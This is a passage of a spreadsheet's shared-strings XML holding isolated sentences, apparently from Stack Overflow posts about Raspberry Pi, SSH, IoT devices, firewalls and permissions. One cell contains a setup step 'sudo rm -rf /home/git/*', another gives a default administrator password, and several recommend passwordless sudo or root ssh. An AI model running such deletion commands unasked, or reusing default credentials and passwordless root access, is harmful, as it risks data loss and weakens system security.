Copy-pasted  and mybitbucket.pub to ~/.ssh on Raspberry
Then git clone git@bitbucket.org:[username]/my_utils.git 
and got this:
Any help?</t>
  </si>
  <si>
    <t>I installed the pydev and ssh(Remote System Explorer) plugin from eclipse marketplace.</t>
  </si>
  <si>
    <t>I have verified the endpoints and certificates and it seems to be fine.</t>
  </si>
  <si>
    <t>The keypad on it isn't too important but I would prefer something that is more reliable than this.</t>
  </si>
  <si>
    <t>Once I enter my ssid and paswword it connects to my router fine.</t>
  </si>
  <si>
    <t>I have insured that I installed the keyboard module using sudo pip install.</t>
  </si>
  <si>
    <t>User configuration file does not exist or is not a regular file,skipping.</t>
  </si>
  <si>
    <t>Data is unencrypted and requires no authentication to connect to it and the application has some other issues.</t>
  </si>
  <si>
    <t>Do any of the laptops or phones need firewall?</t>
  </si>
  <si>
    <t>The middle layer is the keycode (or virtual key on Windows).</t>
  </si>
  <si>
    <t>You have installed smbus and i2ctools, but have you removed i2c-bcm2708 from blacklist?</t>
  </si>
  <si>
    <t>Configure Win7 as authoritative time server.</t>
  </si>
  <si>
    <t>Install Putty.exe and login with putty to your raspbian with ip-adress of your raspbian and you can install apt-get!</t>
  </si>
  <si>
    <t>Look at the keybindings section to see how key handlers are set up.</t>
  </si>
  <si>
    <t>Remote debugging would be the way to go with SSH tunneling.</t>
  </si>
  <si>
    <t>I figured it out, I had the firewall set on my desktop.</t>
  </si>
  <si>
    <t>Your Pi is running an SSH server which allows you to connect to it from other machines using pscp or scp (depending on what OS).</t>
  </si>
  <si>
    <t>If your RPi2 is configured as an access point, it must be running dhcpd on it.</t>
  </si>
  <si>
    <t>If you get a permission denied, then you'll need to change how access to that library is granted.</t>
  </si>
  <si>
    <t>This is what macro VERIFY_OCTAL_PERMISSIONS checks: permissions shouldn't have flag S_IWOTH (second bit) set.</t>
  </si>
  <si>
    <t>The first packet your router sends to the RADIUS IP should already have a User-Name-attribute.</t>
  </si>
  <si>
    <t>Any device you control in your own environment is also fine as a trusted environment.</t>
  </si>
  <si>
    <t>The former is for zero configuration and the latter is for well, configuring services in your network.</t>
  </si>
  <si>
    <t>After setting the password, of course you'll need to use it when logging in with the -p flag.</t>
  </si>
  <si>
    <t>For example, when Android Studio deploys an APK to the device, it does so using  to explicitly grant all requested permissions.</t>
  </si>
  <si>
    <t>This hidden identifier is used for future OTA updates.</t>
  </si>
  <si>
    <t>You could run Xorg on your PC (on which you could install Linux) and connect to the raspberry using ssh -X then remote applications running on your Raspberry are displayed on your PC.</t>
  </si>
  <si>
    <t>On the Pi you want to run the remote script on
First, you need to enable passwordless login on the you want to connect with.</t>
  </si>
  <si>
    <t>See: https://www.raspberrypi.org/documentation/remote-access/ssh/passwordless.md</t>
  </si>
  <si>
    <t>Update:
Failed to connect to device '192.168.1.17' using Universal
  Authentication.</t>
  </si>
  <si>
    <t>But.. strstr is not a tokenizer so some extra code is required to print the substrings.</t>
  </si>
  <si>
    <t>Maybe you should need to check the Firewall configuration at [deviceA].</t>
  </si>
  <si>
    <t>You probably cannot filter all unwanted messages.</t>
  </si>
  <si>
    <t>To unblock bluetooth, execute
rfkill unblock bluetooth
This will unblock bluetooth.</t>
  </si>
  <si>
    <t>Permissions issue
Do you have all the required permissions for using Bluetooth?</t>
  </si>
  <si>
    <t>This is because while it is running as a service X-Windows might not be running, or there might not be a user logged on.</t>
  </si>
  <si>
    <t>If yes, does it need administrator privileges and you try to run as non administrator?</t>
  </si>
  <si>
    <t>An application can also query its security manager to discover which actions are allowed.</t>
  </si>
  <si>
    <t>An iOS application concept to let applications access the file system from their sandboxed environment.</t>
  </si>
  <si>
    <t>DevicePolicyManager is a Java class in Android where device policies (password quality etc) can be set by a third party Device Administrator application.</t>
  </si>
  <si>
    <t>The File Checksum Integrity Verifier (FCIV) is a utility from Microsoft for checking hashes of files.</t>
  </si>
  <si>
    <t>Configuration requires no special tooling on the server, only ssh access and a shell.</t>
  </si>
  <si>
    <t>Indexing of secondary keys can only be done when the key is ordered.</t>
  </si>
  <si>
    <t>Use this tag for greater visibility.</t>
  </si>
  <si>
    <t>Users cannot access any resources that you have not explicitly granted permissions to.</t>
  </si>
  <si>
    <t>The libradius library implements the Remote Authentication  Dial In UserService (RADIUS).</t>
  </si>
  <si>
    <t>All you have to do is explicitly define strategy_dir in your Opauth configuration.</t>
  </si>
  <si>
    <t>That means the end of regular security updates.</t>
  </si>
  <si>
    <t>A bot token is required and can be obtained by talking to @botfather.</t>
  </si>
  <si>
    <t>404.19  Denied by filtering rule.</t>
  </si>
  <si>
    <t>j_seucrity_check is the action that needs to be set on a html form when using Java Servlet Form Authentication (container security).</t>
  </si>
  <si>
    <t>This requires users to set up their Google account on their mobile devices.</t>
  </si>
  <si>
    <t>No agent is required on the target machine.</t>
  </si>
  <si>
    <t>Secondly, I don't know how to repair or even access the remote debugger software.</t>
  </si>
  <si>
    <t>If everything is configured correctly, you should now be able to connect to root@[your external ip].</t>
  </si>
  <si>
    <t>Manatee Works is a barcode scanning/decoding solution for smartphones, tablets, and wearables.</t>
  </si>
  <si>
    <t>Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required.</t>
  </si>
  <si>
    <t>Can be installed without root access,
assuming git and perl are already installed.</t>
  </si>
  <si>
    <t>Badges were a distraction from that, moderator access would increase the number of useful actions available.</t>
  </si>
  <si>
    <t>I want to build a presence detector using raspberry pi, to say if someone is present in a room or not.</t>
  </si>
  <si>
    <t>I am trying to get my sim900 to work with a new simcard, unfortunately the Orange provider denies my entry after I give sim900 the pin of the sim:
 3 means I get denied.</t>
  </si>
  <si>
    <t>I'm developping an application that requires root access, in particular I have to use a particular module of xPosed framework, but it requires root permission.</t>
  </si>
  <si>
    <t>This code:
Works just fine and gives me an encryption value of: 
Encrypted: y3QzsGi6cYiy3GGs31jXvTY8VI2OrlxsohOasiw4pgP+54gWXtUZPrjuRvOfyRTz
Now if i do both encrypt and decrypt then it decodes it just fine.</t>
  </si>
  <si>
    <t>To avoid malicious use, npm is hanging on to the package name, but loosely, and we'll probably give it to you if you want it."</t>
  </si>
  <si>
    <t>Note that when using SSH X11 Forwarding, you do not need to set the DISPLAY variable.</t>
  </si>
  <si>
    <t>You can use ssh:
this assumes that your server is the machine at 192.168.1.50. if not, you're going to need to give me the IPs of all the machines involved and tell me which is which.</t>
  </si>
  <si>
    <t>A keyed archive differs from a non-keyed archive in that all the objects and values encoded into the archive are given names, or keys.</t>
  </si>
  <si>
    <t>An example of the data corrupted:
108
109
11161831191
192
193
194
195
1111
122222222222
2220
22266
267
268
269
270
133333533333633333373
33333333344444444444444444444444444444544444444444444444491
492
493
494
I power the Arduino with an external power supply that gives 5V and 3A with a lot of stability.</t>
  </si>
  <si>
    <t>I needed to assign user www-data into the dialout group in order to have access to /dev/ACM0, and a reboot was required (of the whole server, not just nginx for some reason).</t>
  </si>
  <si>
    <t>The fact that you're getting permission denied locally should make this easier to debug.</t>
  </si>
  <si>
    <t>On most systems, read/write access to  requires root permissions  something that is not granted to apps.</t>
  </si>
  <si>
    <t>It implements Mandatory Access Control to confine programs within their limited set of resources.</t>
  </si>
  <si>
    <t>USB debugging enables Android developers to remotely control devices.</t>
  </si>
  <si>
    <t>The authorization is typically driven through the configuration of VPD/RCAC/FGAC or through an access control policy e.g.</t>
  </si>
  <si>
    <t>Backup batter power is also recommended, to protect against crashes and ungraceful shutdowns.</t>
  </si>
  <si>
    <t>You can author and plug in your own filters for actions, authorization and exception handling.</t>
  </si>
  <si>
    <t>I'm installing it with the following command
During the installation I'm not asked to enter a root password.</t>
  </si>
  <si>
    <t>IoT Edge Transparent Gateway VM is configured with all the certs properly setup, configured and verified.</t>
  </si>
  <si>
    <t>Amazon Macie is a security service that uses machine learning to automatically discover, classify, and protect sensitive data in AWS.</t>
  </si>
  <si>
    <t>This class is particularly important if you want to expose the internal methods of a Flash file to outside world.</t>
  </si>
  <si>
    <t>It turns out domoticz process was running as root and root didn't have the key setup for passwordless ssh.</t>
  </si>
  <si>
    <t>An attribute in .NET to expose members marked as internal to selected assemblies.</t>
  </si>
  <si>
    <t>You use the WindowsIdentity object if you want to make authorization decisions based on a user's Windows account information.</t>
  </si>
  <si>
    <t>If you want to deploy an UWP to a Pi, you do need to have your private build/deploy agent, but you shouldn't copy the files to the device and then install it via PowerShell.</t>
  </si>
  <si>
    <t>+ (mUsbReceiver == null));
        registerReceiver(mUsbReceiver, filter);
        Log.d("onCreate", "registered Receiver..");
        Log.d("onCreate", "Got permission intent...");
        tv04.setText("1");
    }
    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        // Inflate the menu; this adds items to the action bar if it is present.</t>
  </si>
  <si>
    <t>Also I am just curious how this whole process of TCP connection is resolved across a firewall proxy in the above context, please put some suitable reference too.</t>
  </si>
  <si>
    <t>Firstly, you need to check if you have add the capability Private Networks (Client &amp; Server), this capability provides inbound and outbound access to home and work networks through the firewall.</t>
  </si>
  <si>
    <t>On most operating systems, Ring 0 is the level with the most privileges and interacts most directly with the physical hardware such as the CPU and memory.</t>
  </si>
  <si>
    <t>The vulnerability is present when user input is used directly in the SQL commands instead of as parameters or properly filtering them for quotation escape characters.</t>
  </si>
  <si>
    <t>I expect it to find the device based on the remote address, but ledevice remains null and is never updated, triggering a segmentation fault.</t>
  </si>
  <si>
    <t>Assuming you have your Pi ready to ssh, you could view your RPi's GUI by installing xrdp as such 
Then on your windows computer just open up Remote Desktop Connection and proceed as normal.</t>
  </si>
  <si>
    <t>A
  device owner is a specialized type of device administrator that has
  the additional ability to create and remove secondary users and to
  configure global settings on the device.</t>
  </si>
  <si>
    <t>The main purpose of this bootloader is to enable a Raspberry Pi at a remote location, to recover from kernel updates that make the device unbootable as the result of a kernel panic.</t>
  </si>
  <si>
    <t>Deleting SSH keys from the wifi sessions
Completely disabling the firewall
 ipconfig /renew
Restarting both machines after every of the above
Reimaging memory card with newest Raspbian
Any help would be greatly appreciated.</t>
  </si>
  <si>
    <t>I am able to copy files in the terminal on my local pi to my remote pi using scp and SSH keys without a password prompt
like this
But when I use os.system to run the same command in a Python script, the terminal interrupts the script and prompts me for the password to pi@192.168.0.15.</t>
  </si>
  <si>
    <t>while enrolling the iPhone (iphone 6) for the MDM, I am getting profile installation failed at iPhone and at the wso2 server(3.2.0) following error is occurred, however profile installation works fine in the iphone x simulator.</t>
  </si>
  <si>
    <t>The task tests for a certain byte sequence using a state machine and does packet validation before setting a valid packet flag.</t>
  </si>
  <si>
    <t>The property can also be checked using C# this code:
These bluetooth APIs don't seem to be supported in Win10 IoT 2016, as I get a runtime error:
Requested Windows Runtime type 'Windows.Devices.Bluetooth.BluetoothAdapter' is not registered.</t>
  </si>
  <si>
    <t>Download Buildroot
Load the default configuration: raspberrypi_defconfig (this is just a basic configuration)
Add the packages you want thanks to BusyBox (&lt;- Select what you need)
Post-Build configuration (SSH, ETH0 static or dynamic IP address)
The final product occupies 15Mb of Ram.</t>
  </si>
  <si>
    <t>Solved my problem in the following way:
Use the Unix terminal commands to identify the IP and the MAC address of wi-fi or ethernet port (ifconfig)
set up your router to always allocate a address to these respective network connections.</t>
  </si>
  <si>
    <t>You could look to boot up Chromium instead using like Selenium Web Driver  and have it navigate to the JIRA and perform your login using a read only service account on the required projects.</t>
  </si>
  <si>
    <t>From you administrator PS console, type:
Enter-PSSession -ComputerName &lt;IP Address&gt; -Credential localhost\Administrator
7.In the credential dialog enter the following default password:  
p@ssw0rd
Note: The connection process is not immediate and can take up to 30 seconds.</t>
  </si>
  <si>
    <t>Regarding "remote controlling": in order to send cloud-to-device messages you should use the Azure IoT Hub Service SDK for Node, and here is an example of how to send a cloud to device message (copied from here)</t>
  </si>
  <si>
    <t>Set Up SSH Keys
This step is important because it allows you to transfer files from your development machine to the Pi and execute commands remotely without having to type in a username and password every time.</t>
  </si>
  <si>
    <t>The NETCONF protocol defines a simple remote procedure call mechanism through which a network device can be managed, configuration data information can be retrieved, and new configuration data can be uploaded and manipulated.</t>
  </si>
  <si>
    <t>To ensure safe access to a players nonatomic properties while dynamic changes in playback state may be reported, one must serialize access with the receivers notification queue.</t>
  </si>
  <si>
    <t>It is the implementation of reliable and scalable multicast protocol that enables receivers to detect loss, request retransmission of lost data, or notify an application of unrecoverable loss.</t>
  </si>
  <si>
    <t>configuration management, service discovery, circuit breakers, intelligent routing, micro-proxy, control bus, one-time tokens, global locks, leadership election, distributed sessions, cluster state).</t>
  </si>
  <si>
    <t>For example, a Widows Forms application or Windows Service would be the "primary" means of communication with an application, and having a Grapevine RESTServer (or several) listening on a particular protocol/host/port combination would be a secondary means of communication - even if Grapevine is used to expose the majority of the functionality.</t>
  </si>
  <si>
    <t>Most of the code differences to the standard Chromium code base were introduced in order to support Samsung-specific hardware, such as Gear VR and biometric sensors.</t>
  </si>
  <si>
    <t>For example, if an app needs to fetch data from a server, the specific details of how the app should connect to the server (URL, protocol, credentials) are usually externalized in a configuration file so they can be easily customized without requiring code modifications.</t>
  </si>
  <si>
    <t>To support access HTML file you need to add file type association like this:
Here is a C# sample:
If your dynamically created HTML file is in the app installed folder you can do it like this:
On Windows 10 IoT Core, if you want to access C drive like "C:\" you need Set folder permissions for UWP apps.</t>
  </si>
  <si>
    <t>---- and if sudo permissions are the problem ---
a solution could be to put the four restart commands into their own script, and give the lighttpd user sudo permissions to run that script without a password like this: https://serverfault.com/questions/294661/how-to-grant-sudo-rights-only-to-specific-script-files.</t>
  </si>
  <si>
    <t>removed  from project.json file  (for self contained deployment)
built and published the application using dotnet publish -c release -r win10-arm 
copied the published files to UNC share folder in path  
opened the port 5000 in pi powershell session  netsh advfirewall firewall add rule name="DNX Web Server port" dir=in action=allow protocol=TCP localport=5000 
typed 'C:\PROGRAMS\dnxpi\RasberryService.exe' in powershell session to pi
But it errors
Thanks in Advance!</t>
  </si>
  <si>
    <t>The right subtree of a node contains only nodes with keys greater than the node's key.</t>
  </si>
  <si>
    <t>I'm able to log into the website and the windows app just fine.</t>
  </si>
  <si>
    <t>So I ran my C program directly on the Pi and not through SSH, and it actually works fine.</t>
  </si>
  <si>
    <t>: I have tried disabling firewall and clearing out iptables on raspberry pi to not relief.</t>
  </si>
  <si>
    <t>I'm able to connect to my router and ping to Google:
For example, in Firebase:
Or, for Cloudant:
AT+CIPSTART=3,"TCP","https://USERNAME-password@username-bluemix.cloudant.com/estado/doc_estados",8080
ERROR
Is there a way to see what error occurs?</t>
  </si>
  <si>
    <t>That all works, but it installs it under the Administrator account, where as in Win10 IOT you need to install it for the DefaultAccount account if you want it to be able to run.</t>
  </si>
  <si>
    <t>I am actually trying for software update and not firmware update.</t>
  </si>
  <si>
    <t>Please add the "-I bat0" to ping to ensure that network device to be used.</t>
  </si>
  <si>
    <t>Archives (zip, tar and tgz/tar.gz files) are un-archived at the slave nodes.</t>
  </si>
  <si>
    <t>Security updates are installed automatically.</t>
  </si>
  <si>
    <t>I've already tried using brute-force by looping through possible scan codes from 0x2A to 0x80, but none of them works.</t>
  </si>
  <si>
    <t>Is it possible to discover and connect to bluetooth devices using BLE Shield?</t>
  </si>
  <si>
    <t>I then used pip and easy_install to try and install pycrypto, but an error comes up with that, something like 
How can I install pycrypto?</t>
  </si>
  <si>
    <t>i cannot understand, when i trying to configure and connect bluetooth with my android device.</t>
  </si>
  <si>
    <t>I have tried using TightVNC, SSH and Windows Remote Desktop to log onto the Pi, but nothing works.</t>
  </si>
  <si>
    <t>Bad thing is that I don't have the right to access WiFi router configuration.</t>
  </si>
  <si>
    <t>Ideally the SimpleXML jar should work without being exposed outside my bundle.</t>
  </si>
  <si>
    <t>Even filtering doesn't eliminate interference completely.</t>
  </si>
  <si>
    <t>I have a working access point on a rspbi, works perfectly with my captive portal on ios and os x based machines.</t>
  </si>
  <si>
    <t>I have this routing table:
I used SSH to be able to use my Raspberry Pi on my laptop screen.</t>
  </si>
  <si>
    <t>However, the oAuth portion of the google calendar call works only on my development machines and other machines with a built in browser.</t>
  </si>
  <si>
    <t>All permissions firewall settings also checked they are fine.</t>
  </si>
  <si>
    <t>However, the system deny my copy-past procedure by saying that I I have not rights.</t>
  </si>
  <si>
    <t>I can get the root folder name of the flash drive, but when I try to write a file to it, I get an access denied message.</t>
  </si>
  <si>
    <t>I can connect to a public broker, but not to the broker installed on my machine which is connected to the same wifi network.</t>
  </si>
  <si>
    <t>For uploading new firmware(OTA: Over the Air) update, I want to use ESP8266's hotspot AccessPoint because after changing the password of my wifi network, I will not able to do that.</t>
  </si>
  <si>
    <t>I would like to configure a wlan0 static ip and  connect through it by ssh.</t>
  </si>
  <si>
    <t>Here my  :
When I do ifconfig my wlan0 and eth0 interfaces are correctly configured :
However, when I want to ssh my raspberry by wifi, my Wifi router give to my raspberry the ip : 192.168.100.116.</t>
  </si>
  <si>
    <t>Here is what I tried,
Strange that I am asked to config my username and email, when they are already configured with git.</t>
  </si>
  <si>
    <t>When I enroll my first Android device, I am able to install the agent and configure the server.</t>
  </si>
  <si>
    <t>There isn't any error in the applet either as it works perfectly fine in private mode.</t>
  </si>
  <si>
    <t>My team requires a bulletproof way to save a file (less than 100kb) on Windows 10 IOT.</t>
  </si>
  <si>
    <t>For the postgresql.conf content :
I already set listen_addresses = '*' and password_encryption = on , with the rest remained unchanged.</t>
  </si>
  <si>
    <t>PyCrypto installs fine, but Paramiko is where I am having an issue.</t>
  </si>
  <si>
    <t>The OAuth2 server appears to be working fine, and I can see from the logs that the google-side is successfully retrieving the access_token.</t>
  </si>
  <si>
    <t>When I try this using PowerShell I also receive an Access Denied message.</t>
  </si>
  <si>
    <t>I'm designing a machine that requires an automated ignition system.</t>
  </si>
  <si>
    <t>I have installed  ,configured JAVA_HOME, enabled SSH and set up static IP as well.</t>
  </si>
  <si>
    <t>When I do enter the password into the console, the job proceeds and succeeds.</t>
  </si>
  <si>
    <t>The Raspberry will a) not be stolen, b) will power-off and the encrypted folder will be unmounted.</t>
  </si>
  <si>
    <t>I have just bought myself a Raspberry Pi 3 B+, and now I'm trying to connect to it from my normal laptop via SSH.</t>
  </si>
  <si>
    <t>The Problem
There is a third party device physically connected to the same router, but it has a different network configured.</t>
  </si>
  <si>
    <t>The device is located behind a firewall and only have limited access to the internet.</t>
  </si>
  <si>
    <t>I have seen internet routers use linux but can safely be unplugged at anytime.</t>
  </si>
  <si>
    <t>Currently in our test environment, we are using self-generated certificates and it is working fine.</t>
  </si>
  <si>
    <t>In my case i can not discover using routers so is there any other way to achieve this.</t>
  </si>
  <si>
    <t>The publisher module could not talk outside because of a blocking firewall rule.</t>
  </si>
  <si>
    <t>I am running mosquitto which uses below configuration settings in order to connect to azure Iot hub:
Mosquitto on device connects to the iot-bridge which is  using the provided username and sas password.</t>
  </si>
  <si>
    <t>Is there a way to safely reduce this list of required certificates?</t>
  </si>
  <si>
    <t>I know I could use something like Firebase or Blynk, but it would require the devices to have Internet access, which I would want to avoid.</t>
  </si>
  <si>
    <t>Sometimes when I try to set ble device name with esp_ble_gap_set_device_name I get the error result value ESP_ERR_INVALID_STATE (Not always, sometimes I get the name to be set).</t>
  </si>
  <si>
    <t>I thought it was my work corporate proxy, so tried going the wifi route to a hotspot and that doesn't work either.</t>
  </si>
  <si>
    <t>Bluetooth LE would be the way you want to go here, because standard Bluetooth requires your device to be MFi-compliant.</t>
  </si>
  <si>
    <t>There are also chips you can buy (such as the LM8330) that decode a matrix keypad for you, and are accessible over I2C, which only requires two pins.</t>
  </si>
  <si>
    <t>THIS is what I used to accomplish setting up sudo as passwordless.</t>
  </si>
  <si>
    <t>You will have to configure your router with appropriate port forwarding.</t>
  </si>
  <si>
    <t>In libVLC versions before vlc 2.0.5 the native API call to set the audio track was bugged.</t>
  </si>
  <si>
    <t>You will need to run ssh server on the rpi, and possibly set passwordless ssh access using keys.</t>
  </si>
  <si>
    <t>user3308997.no-ip.org
Port forwarding or NAT must be setup in your router so, that e.g.</t>
  </si>
  <si>
    <t>Or your server software would discover the devices via SSDP and initiate a configuration session.</t>
  </si>
  <si>
    <t xml:space="preserve">
Is it possible to discover and connect to bluetooth devices using BLE Shield?</t>
  </si>
  <si>
    <t>You might configure your network this way:
The wpa_supplicant will find the correct configuration by itself.</t>
  </si>
  <si>
    <t>(very important)
Add the Git user: sudo adduser --disabled-login --gecos 'GitLab' git
Delete everything in /home/git sudo rm -rf /home/git/* &amp;&amp; sudo rm -rf /home/git/.</t>
  </si>
  <si>
    <t>In order to access /media/Owncloud, you need to set the proper permissions.</t>
  </si>
  <si>
    <t>You need to set permissions in :
This will allow remote connections to access the database.</t>
  </si>
  <si>
    <t>Account configuration is stored in /home/$USER/.config/ring/dring.yml .</t>
  </si>
  <si>
    <t>Let's say you're accessing it using an external IP of 12.34.56.78:
And if you also decide to use an external hostname:
'trusted_domains' =&gt;
  array (
    0 =&gt; '192.168.10.10',
    1 =&gt; '12.34.56.78',
    2 =&gt; 'owncloud.mydomain.com'
  ),
You can add as many of those as is necessary for your setup.</t>
  </si>
  <si>
    <t>If you're already using a wireless router, you 
may want to look into a Linux based firmware for you router.</t>
  </si>
  <si>
    <t>It requires restricted capability "cellularMessaging" (microsoft partners can request access).</t>
  </si>
  <si>
    <t>Mucking around memory and/or device registers is unsafe on a running system.</t>
  </si>
  <si>
    <t>This is like wifi beaconing (or bluetooth advertising).</t>
  </si>
  <si>
    <t>There are two examples using the daemon (which means root privileges are not required).</t>
  </si>
  <si>
    <t>Here is the link to the repo which allows you to update firmware remotely using the IoT Hub.</t>
  </si>
  <si>
    <t>As far as I know, there is no way of installing it on your desktop but PyCharm has a remote programming feature that allows you to use the PyCharm interface through an ssh connection to your Raspberry Pi.</t>
  </si>
  <si>
    <t>NGROK looks like a great tunneling app but you are not exposing your pi to predatory browsers, so it may be overkill for you.</t>
  </si>
  <si>
    <t>When you have configured the two static IP, you can connect to the raspberry via SSH using the IP set (192.168.1.10).</t>
  </si>
  <si>
    <t>If this is the case you should be able to access the Rasperry Pi using ssh with the IP address configured for wlan0.</t>
  </si>
  <si>
    <t>I am using D-Link router and there is NO rule of IP filtering.</t>
  </si>
  <si>
    <t>This guy explains it: http://absurdlycertain.blogspot.com.es/2013/03/lirc-raspi-remote-control-configuration.html
Do not forget to restart the device, with me it does not work if I do not.</t>
  </si>
  <si>
    <t>Why:
To avoid access communication channel problems .</t>
  </si>
  <si>
    <t>Specifying your device explicitly is preferred method in the most situations.</t>
  </si>
  <si>
    <t>You may have to open your specified port in the Windows 10 IoT firewall.</t>
  </si>
  <si>
    <t>RESYNC - (Future update) A re-request of the user's device info.</t>
  </si>
  <si>
    <t>(Obviously, you'll need to ensure that the user running the web server has write permissions to the device).</t>
  </si>
  <si>
    <t>Then Android will think it needs to login to the network (captive portal) in order to gain internet access.</t>
  </si>
  <si>
    <t>You mentioned that you've tried reinstalling ca-certificates, and ssl-cert should be installed with that or not required.</t>
  </si>
  <si>
    <t>Upgrade to Android Studio 3.0, which will automatically grant these permissions on install for you so you don't need to do either #1 or #2.</t>
  </si>
  <si>
    <t>I logged in AT command mode by connecting the "key" pin from the module to 5V on the board, then setting  and typing AT+UART=9600,0,0.</t>
  </si>
  <si>
    <t>Sore it in S3 private bucket with restricted access and retrieve it in code.</t>
  </si>
  <si>
    <t>There are some ways to fetch Lets Encrypt certificates without the need for an externally accessible server.</t>
  </si>
  <si>
    <t>Devices connected via Bluetooth will have to speak Ethernet over Bluetooth though.</t>
  </si>
  <si>
    <t>I am assume you are talking about installing app not via Microsoft Store.</t>
  </si>
  <si>
    <t>In this case, since you want to use phpMyAdmin to access the data, you have the option of installing phpMyAdmin on your Windows machine or the Raspberry Pi.</t>
  </si>
  <si>
    <t>Could not update the locale either to lose the region lock.</t>
  </si>
  <si>
    <t>you may need --privileged flag in order to have correct permissions.</t>
  </si>
  <si>
    <t>You could also Compare the sshd configurations between the Pi Boxes.</t>
  </si>
  <si>
    <t>Does the URL require cookies to be set ?</t>
  </si>
  <si>
    <t>Most important configuration parameters are:
 * DevEUI (like a MAC address of the device).</t>
  </si>
  <si>
    <t>(not HttpClient)
It does require setting the certificate's sha1 fingerprint in the begin statement.</t>
  </si>
  <si>
    <t>what is strange is that I've no problem using ssh to access the remote server, instead scp is not working.</t>
  </si>
  <si>
    <t>This policy specifies actions that are unsafe or sensitive.</t>
  </si>
  <si>
    <t>Dogecoin is an open source peer-to-peer cryptocurrency.</t>
  </si>
  <si>
    <t>Use --force to steal a lock from another user or working copy.</t>
  </si>
  <si>
    <t>This can be used to open up holes in a firewall for quick access.</t>
  </si>
  <si>
    <t>Uncomplicated Firewall (ufw) is a firewall that is designed to be easy to use.</t>
  </si>
  <si>
    <t>Previously permissions were granted on installation of an app.</t>
  </si>
  <si>
    <t>Questions about installing or configuring the OS and their devices connected to it should be asked on Super User.</t>
  </si>
  <si>
    <t>"bytecode" is a blanket term for opcodes that are consumed by a virtual machine.</t>
  </si>
  <si>
    <t>Unlike NoSQL alternatives they maintain the ACID guarantees of traditional OLTP systems.</t>
  </si>
  <si>
    <t>Use this call to retrieve all orders in which the authenticated caller is either the buyer or seller.</t>
  </si>
  <si>
    <t>Defines a key/value pair that can be set or retrieved.</t>
  </si>
  <si>
    <t>Indeed, the user (or any attacker gaining access to the machine
where the application runs) may hack the application to access unauthorized data.</t>
  </si>
  <si>
    <t>Use external DNS from behind any proxy/firewall.</t>
  </si>
  <si>
    <t>It can set permissions for file patterns  that is, set the permissions even for files that do not yet exist.</t>
  </si>
  <si>
    <t>Most importantly, PAS covers the security involved for users, requiring authentication in order to login to Plone.</t>
  </si>
  <si>
    <t>ISAPI Redirect is a plugin library for Microsoft IIS for filtering and rerouting HTTP traffic to Apache Tomcat.</t>
  </si>
  <si>
    <t>Usually used to describe errors such as access denied or permission denied or similar.</t>
  </si>
  <si>
    <t>Works under medium trust environments when installed in the GAC.</t>
  </si>
  <si>
    <t>If the computer is connected to the network via a router, it may be able to capture network data for any device on connected to the same router.</t>
  </si>
  <si>
    <t>Login functionality required to access restricted area in WordPress.</t>
  </si>
  <si>
    <t>If no wake lock is taken, Android will shut down the CPU in order to save power.</t>
  </si>
  <si>
    <t>Related tags:
windows
windows-services
windows-authentication</t>
  </si>
  <si>
    <t>A Twitter Client can have different permissions, and sometimes needs user authentication in order to be able to do certain actions on their behalf.</t>
  </si>
  <si>
    <t>A configuration profile is an XML file in plist format used for distributing device configuration to iOS and OS X devices.</t>
  </si>
  <si>
    <t>Users are required to have a Google Account in order to use the software.</t>
  </si>
  <si>
    <t>Each service exposes its contract via one or more endpoints.</t>
  </si>
  <si>
    <t>VBA support can also be locked out (not installed) by network administrators as a security measure.</t>
  </si>
  <si>
    <t>Shady DOM, formerly part of polymer, requires webcomponents.js as of Polymer 2.x, so if you are not using Polymer or webcomponents.js, then you should avoid using the shady-dom tag.</t>
  </si>
  <si>
    <t>Infection currently supports PHPUnit and PhpSpec test frameworks, requires PHP 7.1+ and Xdebug/phpdbg installed.</t>
  </si>
  <si>
    <t>You can enable all of these
features by setting the sandbox configuration.</t>
  </si>
  <si>
    <t>Okay, so after some more digging around, I discovered that there was a separate .ssh directory under /root that contained an authorized_keys file.</t>
  </si>
  <si>
    <t>I have also checked my router and ensured the WiFi shield was connecting properly.</t>
  </si>
  <si>
    <t>Every solution I've seen requires that such an app be given sudo-superpowers because gpio is accessed through direct memory access.</t>
  </si>
  <si>
    <t>This is a bare bones installation of raspbian and I have not installed a firewall on it, so not sure why I would not be able to access jenkins on my local network.</t>
  </si>
  <si>
    <t>I would like to expose my problem here because I have been struggling for several weeks to configure Gulp stably on my Raspberry server.</t>
  </si>
  <si>
    <t>Alternatively SSH and port foward the router's respective ports to the RPI, then use SFTP.</t>
  </si>
  <si>
    <t>This isn't quite a "private" action, but it doesn't require review from Google, and it does let you limit which accounts have access to it.</t>
  </si>
  <si>
    <t>Kiosk-mode represents a locked down OS environment where the user can interact with a limited UI.</t>
  </si>
  <si>
    <t>Basic Configuration:
First, to make WinRM work on the server we need the Windows Firewall to be enabled.</t>
  </si>
  <si>
    <t>By giving a PendingIntent to another application, you are granting it the right to perform the operation you have specified as if the other application was yourself (with the same permissions and identity).</t>
  </si>
  <si>
    <t>pfSense is commonly deployed as a perimeter firewall, router, wireless access point, DHCP server, DNS server, and as a VPN endpoint.</t>
  </si>
  <si>
    <t>Add-ons usually require that you give your permission before they're installed on your computer.</t>
  </si>
  <si>
    <t>Audits record security-related actions for later review by a security administrator.</t>
  </si>
  <si>
    <t>Windows Defender is available in a Server Core installation, and is installed and enabled by default.</t>
  </si>
  <si>
    <t>The most important part would be thresholding and detecting blobs (which I haven't figured to how to do with the limited resources, but that aside).</t>
  </si>
  <si>
    <t>Since this is only for learning purpose, there's really nothing important and there's no sensitive data saved on this machine.</t>
  </si>
  <si>
    <t>iOS devices need an app running to make themselves send iBeacon transmissions.</t>
  </si>
  <si>
    <t>Here is what I did to make it work:
install the key on a common laptop and check the internet access.</t>
  </si>
  <si>
    <t>If your presentation need root privileges (I don't see why it would, but anyway), you could use gksudo on your code, then at boot you would see a window asking for your password to proceed.</t>
  </si>
  <si>
    <t>To make it hard to gain access without permission usually a algorithm which requires a shared-secret-key is used (only known by the ECU and by the applications who need access).</t>
  </si>
  <si>
    <t>For brute force, you could try:
In the above snippet, each character is casted to an integer to get the internal representation value, then output.</t>
  </si>
  <si>
    <t>as suggested by @thebjorn
SOLUTION: The solution for me was to explicitly set the pi user (the one that I use when logged in).</t>
  </si>
  <si>
    <t>Use an extra level of indirection to support distributed, controlled, or intelligent access.</t>
  </si>
  <si>
    <t>This is an exceedingly common problem in backup jobs that try to archive with timestamp, e.g.</t>
  </si>
  <si>
    <t>You'll probably prefer to issue your own certificates since allows you to fine control your customers accesses, this feature is also supported by AWS Iot.</t>
  </si>
  <si>
